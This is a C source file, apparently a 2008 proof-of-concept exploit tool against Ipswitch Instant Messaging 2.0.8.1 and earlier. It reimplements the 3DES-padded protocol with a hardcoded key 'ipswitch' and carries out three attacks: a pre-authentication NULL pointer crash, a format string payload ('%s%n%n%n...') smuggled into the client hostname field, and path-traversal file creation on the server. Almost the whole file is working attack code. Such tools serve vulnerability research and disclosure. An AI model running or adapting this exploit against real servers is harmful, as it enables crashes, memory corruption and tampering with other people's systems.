/*
    Copyright 2008 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "des.h"
#include "show_dump.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        5177
#define BUFFSZ      0xffff
#define IPIM_DESKEY "ipswitch\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"



#define padxx(X,Y) p += putxx(p, X, Y); p += padda(p, p - buff);
int conna(struct sockaddr_in *peer);
int lame_im_recv(int sd, des3_context *ctx, u8 *buff);
int fgetz(u8 *data, int size, FILE *fd);
void desuca(des3_context *ctx, u8 *data, int len);
int tcp_recv(int sd, u8 *buff, int len);
int padda(u8 *data, int pos);
int putsn(u8 *data, u8 *str);
int putsp(u8 *data, u8 *str);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    des3_context    cli,
                    srv;
    struct  sockaddr_in peer;
    int     sd,
            i,
            len,
            myid,
            attack;
    u16     port        = PORT,
            myport      = PORT + 1;
    u8      username[128],
            password[128],
            recipient[128],
            myhost[128],
            *message    = "hello",
            *userhost   = NULL,
            *buff,
            *host,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Ipswitch Instant Messaging <= 2.0.8.1 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = pre-auth NULL pointer crash in decryption function\n"
            " 2 = format string in logging\n"
            " 3 = arbitrary empty files creation\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);
    if((attack < 1) || (attack > 3)) {
        printf("\nError: wrong attack number (%s)\n", argv[1]);
        exit(1);
    }
    host = argv[2];

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    if(attack != 1) {
        printf("- insert your username (only it without @host): ");
        fgetz(username, sizeof(username), stdin);
        userhost = malloc(strlen(username) + 1 + strlen(host) + 1);
        sprintf(userhost, "%s@%s", username, host);

        printf("- insert your password: ");
        fgetz(password, sizeof(password), stdin);

        strcpy(myhost, "127.0.0.1");    // the server trusts the host:port told by the user!
        recipient[0] = 0;

        if(attack == 2) {
            strcpy(myhost, "format_string_%s%n%n%n%s%s%s%s%s%n%n%n");
        } else if(attack == 3) {
            printf(
                "- insert the name of the empty file you want to create remotely\n"
                "  (for example ..\\..\\..\\windows\\hello.txt): ");
            fgetz(recipient, sizeof(recipient) - 1, stdin); // -1 is needed here for ':'
            printf("- added the ':' char for arbitrary file creation\n");
            strcat(recipient, ":");
        }
    }

    sd = conna(&peer);

        // the IpSwitch IM one is the most ugly protocol I have ever seen, everything is padded to 8 bytes for the 3DES encryption!
        // and I'm so mad to have written this PoC which emulates it 8-)

    if(attack == 1) {
        p = buff;
        p += putxx(p, 7,        32);    // type, not important
        p += putxx(p, 0,        32);
        p += putxx(p, 1,        32);    // must be != 0
        p += putxx(p, 0,        32);
        p += putxx(p, 0,        32);
        p += putxx(p, 0,        32);
        p += putxx(p, 0,        32);

        printf("- send malformed packet\n");
        send(sd, buff, p - buff, 0);

        for(;;) {
            if(timeout(sd, 5) < 0) break;
            len = recv(sd, buff, BUFFSZ, 0);
            if(len <= 0) break;
        }
        goto quit;
    }

    des3_set3key_enc(&cli, IPIM_DESKEY);
    des3_set3key_dec(&srv, IPIM_DESKEY);

    p = buff;
    p += putxx(p, 7,            32);        // type
    p += putxx(p, 1,            32);        // encryption type?
    send(sd, buff, p - buff, 0);

    p = buff;
    padxx(1,                    32);        // type
    padxx(11,                   32);        // header size
    padxx(0,                    32);        // data size
    padxx(0,                    32);        // data size - 4
    p += putsn(p, userhost);                // username@host
    p += putsn(p, password);                // password
    p += putxx(p, 0,            32);        // ???
    p += putsn(p, myhost);                  // client hostname
    p += putxx(p, myport,       32);        // client port
    putxx(buff + 16, p - (buff + 28), 32);
    putxx(buff + 24, p - (buff + 32), 32);

    printf("- send login packet\n");
    p += padda(p, p - buff);
    desuca(&cli, buff, p - buff);
    send(sd, buff, p - buff, 0);

    if(lame_im_recv(sd, &srv, buff) < 0) goto quit;
    getxx(buff, &myid, 32);
    if(myid) goto quit; // error message

    getxx(buff + 8, &myid, 32);
    printf("- your ID is %d\n", myid);

    if(attack == 2) {
        printf("\n"
            "- now you have two choices:\n"
            "  - press RETURN, take the IM client, login with a different account (so don't\n"
            "    use %s), add %s to your Personal Contact and send a messagge to him\n"
            "  - type the name of another user online and this tool will send a \"%s\"\n"
            "    message to him so when he will reply will exploit the vulnerability too\n"
            "- insert the name of the user to who you want to send the message or press\n"
            "  RETURN to quit: ", username, username, message);
        fgetz(recipient, sizeof(recipient), stdin);
        if(!recipient[0]) goto quit;
    }

    close(sd);  // by default IP IM doesn't use the persistent connections
    sleep(ONESEC);
    sd = conna(&peer);

    p = buff;
    p += putxx(p, 7,            32);
    p += putxx(p, 1,            32);
    send(sd, buff, p - buff, 0);

    p = buff;
    padxx(3,                    32);
    padxx(myid,                 32);
    memset(p, 0, 56);
    p += 56;

    for(i = 2; i >= 1; i--) {
        padxx(1,                32);
        p += putsp(p, "_displayname");
        p += putsp(p, username);
        padxx(-1,               32);
        padxx(-1,               32);
        padxx(0,                32);
        p += putsp(p, "Online");
        padxx(0,                32);
        p += putsp(p, username);
        p += putsp(p, host);
        padxx(-1,               32);
        padxx(myport,           16);
        padxx(port,             16);
        padxx(i,                32);
    }

    p += putsp(p, "_displayname");
    p += putsp(p, recipient);
    padxx(10000,                32);
    padxx(10008,                32);
    padxx(1,                    32);
    p += putsp(p, "Online");
    padxx(0,                    32);
    p += putsp(p, recipient);
    p += putsp(p, host);
    padxx(-1,                   32);
    padxx(myport,               16);
    padxx(port,                 16);
    padxx(1,                    32);
    padxx(1,                    32);
    padxx(0,                    32);
    p += putsp(p, message);

    printf("- send message packet\n");
    p += padda(p, p - buff);
    desuca(&cli, buff, p - buff);
    send(sd, buff, p - buff, 0);

    if(lame_im_recv(sd, &srv, buff) < 0) goto quit;

quit:
    printf("- finished\n");
    close(sd);
    free(buff);
    return(0);
}



int conna(struct sockaddr_in *peer) {
    int     sd;

    printf("- connect...");
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
      < 0) std_err();
    printf("ok\n");
    return(sd);
}



int lame_im_recv(int sd, des3_context *ctx, u8 *buff) {
    int     len,
            t;

    printf("- receive and visualize incoming data:\n");
    if(tcp_recv(sd, buff, 8) != 8) return(-1);    // version

    for(len = 0; len < BUFFSZ; len += t) {
        if(timeout(sd, 5) < 0) break;
        t = recv(sd, buff + len, BUFFSZ - len, 0);
        if(t <= 0) break;
    }
    desuca(ctx, buff, len);
    show_dump(buff, len, stdout);
    return(0);
}



int fgetz(u8 *data, int size, FILE *fd) {
    u8      *p;

    fgets(data, size, fd);
    for(p = data; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
    return(p - data);
}



void desuca(des3_context *ctx, u8 *data, int len) {
    for(len >>= 3; len; len--) {
        des3_crypt_ecb(ctx, data, data);
        data += 8;
    }
}



int tcp_recv(int sd, u8 *buff, int len) {
    int     t,
            ret;

    for(ret = 0; ret < len; ret += t) {
        if(timeout(sd, 5) < 0) break;
        t = recv(sd, buff + ret, len - ret, 0);
        if(t <= 0) break;
    }
    return(ret);
}



int padda(u8 *data, int pos) {
    pos = ((pos + 7) & (~7)) - pos;
    if(data) memset(data, 0, pos);
    return(pos);
}



int putsn(u8 *data, u8 *str) {
    int     len;

    len = strlen(str) + 1;
    putxx(data, len, 32);
    memcpy(data + 4, str, len);
    return(4 + len);
}



int putsp(u8 *data, u8 *str) {  // as above but with padded stuff
    int     len;
    u8      *p;

    len = strlen(str) + 1;
    p = data;
    p += putxx(p, len, 32);
    p += padda(p, p - data);
    memcpy(p, str, len);
    p += len;
    p += padda(p, p - data);
    return(p - data);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << ((bytes - 1 - i) << 3));
    }
    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


